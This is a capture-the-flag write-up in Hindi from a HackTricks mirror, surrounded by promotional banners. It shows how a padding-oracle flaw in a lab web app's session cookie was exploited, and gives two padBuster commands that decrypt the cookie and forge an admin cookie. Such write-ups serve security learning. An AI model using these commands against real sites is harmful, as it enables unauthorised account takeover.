mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-16 09:48:14 +00:00
6.1 KiB
6.1 KiB
hc0n Christmas CTF - 2019
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी को हैकट्रिक्स में विज्ञापित किया जाए? या क्या आप PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स की जाँच करें!
- द पीएस फैमिली की खोज करें, हमारा विशेष एनएफटी संग्रह।
- आधिकारिक PEASS और हैकट्रिक्स स्वैग प्राप्त करें।
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर पर 🐦@carlospolopm** का पालन करें**।
- अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो और हैकट्रिक्स-क्लाउड रेपो में पीआर जमा करके।
Enumeration
मैंने मेरे टूल Legion का उपयोग करके मशीन का जाँच करना शुरू किया:
2 खुले पोर्ट हैं: 80 (HTTP) और 22 (SSH)
वेब पेज में आप नए उपयोगकर्ता रजिस्टर कर सकते हैं, और मुझे पता चला कि कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर है:
और अगर आप कुकी के कुछ बाइट को बदलते हैं तो आपको यह त्रुटि मिलती है:
इस जानकारी के साथ और पैडिंग ऑरेकल वल्नरेबिलिटी को पढ़ने के साथ मैंने इसे एक्सप्लॉइट करने में सक्षम था:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
उपयोगकर्ता व्यवस्थापक को सेट करें:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स की जांच करें!
- हमारे विशेष NFTs कलेक्शन, The PEASS Family की खोज करें
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm.
- हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो को PRs सबमिट करके।